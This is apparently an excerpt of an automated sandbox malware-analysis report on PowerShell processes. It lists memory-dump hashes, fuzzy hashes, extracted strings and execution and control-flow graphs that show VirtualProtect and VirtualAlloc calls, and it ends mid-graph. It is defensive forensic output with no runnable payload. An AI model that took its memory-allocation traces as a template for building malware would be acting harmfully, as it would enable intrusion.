                                                                                                  • Instruction Fuzzy Hash: 45312E31A0DB4C4FEB69DFAC88596E97BE0EF56320F04416FD089C7162D6745849C751
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8de1d351b3227de58fecb6673677b8a74c4cc7b1461cea249381373a60e7f3f2
                                                                                                  • Instruction ID: 262ee15e9e97eb2a8bf0bc14878c19be0ada143eeeabfeabf589b46ad613b6ea
                                                                                                  • Opcode Fuzzy Hash: 8de1d351b3227de58fecb6673677b8a74c4cc7b1461cea249381373a60e7f3f2
                                                                                                  • Instruction Fuzzy Hash: AE319330A1CA0C9FDB1C9B4CA84AAA977E0FB99311F00422FE459D3251DB71A8568BC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f366b5ea978fe34eca9b10903781fed523eae00bc33e94a2b8d013e956b4d9c3
                                                                                                  • Instruction ID: d8f47eb7e71ad10fbef861f17ff4bdbf86233db7caac7f7d6f6466bef6e57df8
                                                                                                  • Opcode Fuzzy Hash: f366b5ea978fe34eca9b10903781fed523eae00bc33e94a2b8d013e956b4d9c3
                                                                                                  • Instruction Fuzzy Hash: 6521C332B0EA8B0FE7B5DB58446257466D2EFA5210B5A02BEE05EC71F6DE58ED048341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.3001397492.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9bad0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21bd1e17c73857b2da485902534c3e0e31bb0d7207716d23f7365ddc89eec673
                                                                                                  • Instruction ID: d4296cca9deac2bad88ae731da78ae7774e44fc6b90d7877858ba6d12c6f5fce
                                                                                                  • Opcode Fuzzy Hash: 21bd1e17c73857b2da485902534c3e0e31bb0d7207716d23f7365ddc89eec673
                                                                                                  • Instruction Fuzzy Hash: F211BF32A0F9890FE7B4DB6C84745B876D1EF80220B5A02BED05EC71B6DE55AD408340
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000016.00000002.2994619631.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_22_2_7ffd9ba00000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                  • API String ID: 0-1500707516
                                                                                                  • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                  • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                  • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                  • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0ccbfb420b7257a97b5e306c7738f8b0b022a58743c0bddf0909f462de33642
                                                                                                  • Instruction ID: 058c7ea8c4154b9c259e36c0e4e6993867fa8df3d00afa36ee085cd3a4f3ecb2
                                                                                                  • Opcode Fuzzy Hash: a0ccbfb420b7257a97b5e306c7738f8b0b022a58743c0bddf0909f462de33642
                                                                                                  • Instruction Fuzzy Hash: 6FD12917F1E6A75BE321B7ACA8B54E93FA0DF9127670901B7D1C9C60A3E905690AC3D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50c71317339ff5811f36f7e55a0efef4b6ebcfb30681434c0d51bacf5eceea23
                                                                                                  • Instruction ID: 888e48b8f9af72ca6e94ed77a770548282337af889f7eb717d5ac91f3a4d4537
                                                                                                  • Opcode Fuzzy Hash: 50c71317339ff5811f36f7e55a0efef4b6ebcfb30681434c0d51bacf5eceea23
                                                                                                  • Instruction Fuzzy Hash: D0D14730B2DA4D4FD798EF5CC895AB57BE1EF95320F1001BED08AC32A6DA25E846C741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6fa83544fdffa94e3ad9004ce5754766ce652f296fb632221bcd1e0963bcf64
                                                                                                  • Instruction ID: 5ea6798ae4e225f826eadf10a4d79de704d6ca08a47e7dbeaa4262d6efb7c088
                                                                                                  • Opcode Fuzzy Hash: b6fa83544fdffa94e3ad9004ce5754766ce652f296fb632221bcd1e0963bcf64
                                                                                                  • Instruction Fuzzy Hash: FDD13532B0EA8E0FEBA5EB6C48655B57BA0EF66314B1901FED45DC70E3D958AC05C341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 007abf8e7f9fc2642cee350aedacafd1de3e38917613a9db1b074d3aa2398543
                                                                                                  • Instruction ID: ac29869658b0563f5c83222ff8b410658176352a9115b542f76c17c99f6345c8
                                                                                                  • Opcode Fuzzy Hash: 007abf8e7f9fc2642cee350aedacafd1de3e38917613a9db1b074d3aa2398543
                                                                                                  • Instruction Fuzzy Hash: 20512632B0EA8E0FE7A9AB6C446157477D2EFA4220B1A00BFC19EC71B7DE14EC058345
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bafe9d38de45dead31391d672c0fb39586947b75276171f985935b4c3a3b50d2
                                                                                                  • Instruction ID: 4d59c38e1fdf5104dcf80bb9b0b75de6579bc0c2db1c3352ba2da893301dd192
                                                                                                  • Opcode Fuzzy Hash: bafe9d38de45dead31391d672c0fb39586947b75276171f985935b4c3a3b50d2
                                                                                                  • Instruction Fuzzy Hash: F441F532B0EA8D0FE7B9E76854606B877D1EF84220B1A01FED45EC72A7EE15AD018345
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2953930069.00007FFD9B8DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b8dd000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cae76aa6c1770c4feed6dcb408f16507d0a174564bda8701479e33a47f7a6758
                                                                                                  • Instruction ID: 909c0407f38644636fe59a42808244f6be174ae47d0735abe4cab84eee71d04e
                                                                                                  • Opcode Fuzzy Hash: cae76aa6c1770c4feed6dcb408f16507d0a174564bda8701479e33a47f7a6758
                                                                                                  • Instruction Fuzzy Hash: 4341367040EBC44FD7578B399855A523FF0EF57321B0A06EFD088CB5A3D629A846C7A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 59cfa342d8554e1323c86027cbabdae1dbe0d459a0610b05193a3fc2b39d3dd4
                                                                                                  • Instruction ID: bd41ec0a5c9249990a7e3bc63e14cb5ed3e4cf93315e69bb7724103ccd2b222c
                                                                                                  • Opcode Fuzzy Hash: 59cfa342d8554e1323c86027cbabdae1dbe0d459a0610b05193a3fc2b39d3dd4
                                                                                                  • Instruction Fuzzy Hash: 2831C831A1CB4C5FDB18EB5CA846AE97BE0FB59321F00422FE449D3252CB71A855CBC6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71de891296f2632b51db950f1abc03021afccc06c2512999eca760ca4e182865
                                                                                                  • Instruction ID: 8b7eebda9cc87db6735d652ff9b667c8d8f2b0c3e647c85d3514f9742aeac80b
                                                                                                  • Opcode Fuzzy Hash: 71de891296f2632b51db950f1abc03021afccc06c2512999eca760ca4e182865
                                                                                                  • Instruction Fuzzy Hash: EF21C132B0EA8B0FE7B9EB5C446257467D2EF61220B5A10BED09EC71F2DE18ED048305
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09e5a665dc43f01e54cd100c53e14987d7431ae6240aebf7a4cec0bc9a711448
                                                                                                  • Instruction ID: 3b94cd12925a35f311227c319ca3f55daa527db903d5d2bbc15742e7ccf8320d
                                                                                                  • Opcode Fuzzy Hash: 09e5a665dc43f01e54cd100c53e14987d7431ae6240aebf7a4cec0bc9a711448
                                                                                                  • Instruction Fuzzy Hash: 3B11BF32A0E9890FE7B4E75894605B87AD1EF80220B5A00FED45DC72B6DD55AD008344
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                  • Instruction ID: 4dd6f5e87c23be5727fba137d59d1ad777011c451dbc05b8ab661a33166cf41a
                                                                                                  • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                  • Instruction Fuzzy Hash: B501677121CB0C4FD748EF0CE451AA5B7E0FB95364F50056DE58AC36A5DB36E882CB45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ce0bca794b0e483338a89cbbf4e62d33a9821968d6026cdcb8289f759f80a80f
                                                                                                  • Instruction ID: c630169e8ee464e73adae2b405ebde2e1267bbc3402618be6aa3f81b43e36195
                                                                                                  • Opcode Fuzzy Hash: ce0bca794b0e483338a89cbbf4e62d33a9821968d6026cdcb8289f759f80a80f
                                                                                                  • Instruction Fuzzy Hash: 24F0243181868D4FEB4AEF2888294D57FA0EF26320F15029BE448C70B2DB649958CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                  • API String ID: 0-4116931533
                                                                                                  • Opcode ID: 96725cc96c0d45b83616c1728daf5a7ad218922735d25ec7bec5547ac2272062
                                                                                                  • Instruction ID: 5cd5b64cbfb0d6f9ee547f577b423769bb94c1642fd261d6b9219aae30a127de
                                                                                                  • Opcode Fuzzy Hash: 96725cc96c0d45b83616c1728daf5a7ad218922735d25ec7bec5547ac2272062
                                                                                                  • Instruction Fuzzy Hash: 462124777084265FE30677EDBCA09D87780DB9427674A01B3D369CF543D916688B87C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3dd3b43a33b319e67a3eca3a83bf658d66c586d68b7f8dce85fd4f5626e4c8af
                                                                                                  • Instruction ID: fc680a89315a4f4777e01a38b0dcae483903fa9fc086671dffcf00c84bee3110
                                                                                                  • Opcode Fuzzy Hash: 3dd3b43a33b319e67a3eca3a83bf658d66c586d68b7f8dce85fd4f5626e4c8af
                                                                                                  • Instruction Fuzzy Hash: 77D12532B0EB8E0FEBA59BAC48655B57FA1EF56310B0901FED49DCB0E3D958A805C341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20cdf1255ebba025503a311bd328a05d29c26b50f32893b01eb72b49f1614881
                                                                                                  • Instruction ID: 0d7169426eab7b6747c2957362130fd431afb578c95cece6cdded3d733032ebf
                                                                                                  • Opcode Fuzzy Hash: 20cdf1255ebba025503a311bd328a05d29c26b50f32893b01eb72b49f1614881
                                                                                                  • Instruction Fuzzy Hash: 1F81483160DB4C4FD799DB5CC895AB57BE0EF9A320F1401BED08EC71A3DA65A846CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d1cd233dc249954ead2e4bacd988c57a51a483f1a3149f79cd14473ada063fa1
                                                                                                  • Instruction ID: 3184f5c59297ce8b7b729016c14680ea47804019f2f2b036a07bbf5641deba99
                                                                                                  • Opcode Fuzzy Hash: d1cd233dc249954ead2e4bacd988c57a51a483f1a3149f79cd14473ada063fa1
                                                                                                  • Instruction Fuzzy Hash: 90511632B0EB4A0FE7A99B5D44615B47BD2EF95210B1A00BFC15EC72B7DE18EC058345
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0e74aaa708007b74ed743ad0f5f76d8b02f9685a443d10569e9882ed46fe276
                                                                                                  • Instruction ID: b8a5df78e0ba0f693127a206c951b0d41926227c96a97e8d711d1205326f19c2
                                                                                                  • Opcode Fuzzy Hash: f0e74aaa708007b74ed743ad0f5f76d8b02f9685a443d10569e9882ed46fe276
                                                                                                  • Instruction Fuzzy Hash: F8416B71E0EA884FEB189F5C9C5A6A87FE0FB95710F14417FD09887293DA60AD05CBC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1bb29106f5863242a9b47e6013093d5f71cd209b2745fd256277f55a33840ce5
                                                                                                  • Instruction ID: 4f30fce4d1b5406d00a300bc323820a6ed82a4491178f33bf3ee3b173dd31671
                                                                                                  • Opcode Fuzzy Hash: 1bb29106f5863242a9b47e6013093d5f71cd209b2745fd256277f55a33840ce5
                                                                                                  • Instruction Fuzzy Hash: 4F41E332B0EB8D0FEBB9D76894605F47BD1EF84220B0A01BED45EC71A7EE15AD058341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2850566585.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9b90d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e1af1eeecde9dbaf1a4ff7e1c5bc3e4ec6b3d4562762cbfd11b46092fea819b
                                                                                                  • Instruction ID: 219a390563db3ee3882d4598a8349022f68ab8c376359e531f512df29ee17c83
                                                                                                  • Opcode Fuzzy Hash: 2e1af1eeecde9dbaf1a4ff7e1c5bc3e4ec6b3d4562762cbfd11b46092fea819b
                                                                                                  • Instruction Fuzzy Hash: 2041287181EBC45FE7568B2898559523FF0EF53220B1A01DFD0C8CB1A3D629A846C7A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f19ea3756c337a1a4d318b8e05116902134446db4a1c106d3e9a8e6ed893630d
                                                                                                  • Instruction ID: 2ea40b7b1c54013ba64707403fb69ffac9250286b9b4eeba3bad2d29ba0830c4
                                                                                                  • Opcode Fuzzy Hash: f19ea3756c337a1a4d318b8e05116902134446db4a1c106d3e9a8e6ed893630d
                                                                                                  • Instruction Fuzzy Hash: 4621BF22B0EB8B0FE7B99B5D45625B46AD2EF61210B5A00BED05EC71F2DE18ED058305
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf94f26bdb72b7c14cd534410e289c893f342c14a356a06b24575fedbb1463a2
                                                                                                  • Instruction ID: 0d0bae60dbe45156a03e57b31ffa75846d8cb4693969b34c719cd07d49eb3316
                                                                                                  • Opcode Fuzzy Hash: bf94f26bdb72b7c14cd534410e289c893f342c14a356a06b24575fedbb1463a2
                                                                                                  • Instruction Fuzzy Hash: AE11BC32B0FA8A0FE7B5DB6984605B87AD1EF40220B5A01BED46EC71B6DE59AD048341
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction ID: ef0cfff55408565f3f2370646d3c2087cfd556061bc4c6768bd386db64d07b43
                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction Fuzzy Hash: B901A73020CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f44e094252406662c1e7a8b3e7cfe3f9d35e282452c1b66e49475c2bc90d1bc2
                                                                                                  • Instruction ID: d44dba6762f8e6b16f5fbc3e01229f0d482b507801f98f081201fd5cfd5338be
                                                                                                  • Opcode Fuzzy Hash: f44e094252406662c1e7a8b3e7cfe3f9d35e282452c1b66e49475c2bc90d1bc2
                                                                                                  • Instruction Fuzzy Hash: 29F0243180868D4FDB06EF2888294D57FA0EF26310B0502ABE848C70B2DB649558CB82

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:6
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 14710 7ffd9ba221ce 14711 7ffd9ba221dd VirtualProtect 14710->14711 14713 7ffd9ba2231d 14711->14713 14714 7ffd9ba23bbd 14715 7ffd9ba23bdf VirtualAlloc 14714->14715 14717 7ffd9ba23cf5 14715->14717

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 36 7ffd9ba2ba1d-7ffd9ba2ba58 37 7ffd9ba2ba5f-7ffd9ba2babf 36->37 38 7ffd9ba2ba5a 36->38 42 7ffd9ba2bacd-7ffd9ba2badc 37->42 43 7ffd9ba2bac1 37->43 38->37 44 7ffd9ba2bade 42->44 45 7ffd9ba2bae3-7ffd9ba2baec 42->45 43->42 44->45 46 7ffd9ba2baee-7ffd9ba2bafd 45->46 47 7ffd9ba2bb19-7ffd9ba2bb74 45->47 48 7ffd9ba2baff 46->48 49 7ffd9ba2bb04-7ffd9ba2bb14 46->49 57 7ffd9ba2bb76 47->57 58 7ffd9ba2bb7b-7ffd9ba2bbdc 47->58 48->49 51 7ffd9ba2d47d-7ffd9ba2d559 call 7ffd9ba2e6a6 49->51 70 7ffd9ba2d55f-7ffd9ba2d65d 51->70 71 7ffd9ba2d666-7ffd9ba2d6be 51->71 57->58 58->51 70->71 109 7ffd9ba2d65f 70->109 78 7ffd9ba2d6c4-7ffd9ba2d70f 71->78 79 7ffd9ba2d855-7ffd9ba2d931 71->79 89 7ffd9ba2d83c-7ffd9ba2d849 78->89 116 7ffd9ba2da12-7ffd9ba2da65 79->116 117 7ffd9ba2d937-7ffd9ba2d940 79->117 90 7ffd9ba2d84f-7ffd9ba2d850 89->90 91 7ffd9ba2d714-7ffd9ba2d722 89->91 96 7ffd9ba2dc0d-7ffd9ba2dc6c 90->96 94 7ffd9ba2d724 91->94 95 7ffd9ba2d729-7ffd9ba2d7a9 91->95 94->95 111 7ffd9ba2d7b0-7ffd9ba2d82a 95->111 112 7ffd9ba2d7ab 95->112 110 7ffd9ba2df34-7ffd9ba2df61 96->110 109->71 119 7ffd9ba2dc71-7ffd9ba2dcad 110->119 120 7ffd9ba2df67-7ffd9ba2df8b call 7ffd9ba2e709 110->120 142 7ffd9ba2d834-7ffd9ba2d839 111->142 143 7ffd9ba2d82c-7ffd9ba2d831 111->143 112->111 134 7ffd9ba2dbfa-7ffd9ba2dc07 116->134 117->116 128 7ffd9ba2dcaf-7ffd9ba2dcc6 119->128 129 7ffd9ba2dcca-7ffd9ba2df31 119->129 138 7ffd9ba2df8d 120->138 139 7ffd9ba2df94-7ffd9ba2dfc8 120->139 128->129 129->110 134->96 136 7ffd9ba2da6a-7ffd9ba2da78 134->136 140 7ffd9ba2da7f-7ffd9ba2db1f 136->140 141 7ffd9ba2da7a 136->141 138->139 146 7ffd9ba2dfe8-7ffd9ba2dffe 139->146 147 7ffd9ba2dfca-7ffd9ba2dfd7 139->147 177 7ffd9ba2db8f-7ffd9ba2dbb7 140->177 178 7ffd9ba2db21-7ffd9ba2db49 140->178 141->140 142->89 143->142 151 7ffd9ba2e000-7ffd9ba2e005 146->151 152 7ffd9ba2e05c 146->152 149 7ffd9ba2dfde-7ffd9ba2dfe6 147->149 150 7ffd9ba2dfd9 147->150 149->146 150->149 154 7ffd9ba2e1c4-7ffd9ba2e1c8 151->154 155 7ffd9ba2e00b-7ffd9ba2e021 151->155 157 7ffd9ba2e07f-7ffd9ba2e109 152->157 159 7ffd9ba2e1ce-7ffd9ba2e1d7 154->159 160 7ffd9ba2e4d7-7ffd9ba2e52f 154->160 155->157 157->154 197 7ffd9ba2e10f-7ffd9ba2e11b 157->197 164 7ffd9ba2e1e1-7ffd9ba2e1ea 159->164 165 7ffd9ba2e1d9-7ffd9ba2e1de 159->165 179 7ffd9ba2e697-7ffd9ba2e6a5 160->179 180 7ffd9ba2e535-7ffd9ba2e5ca 160->180 166 7ffd9ba2e4c1-7ffd9ba2e4d1 164->166 165->164 166->160 168 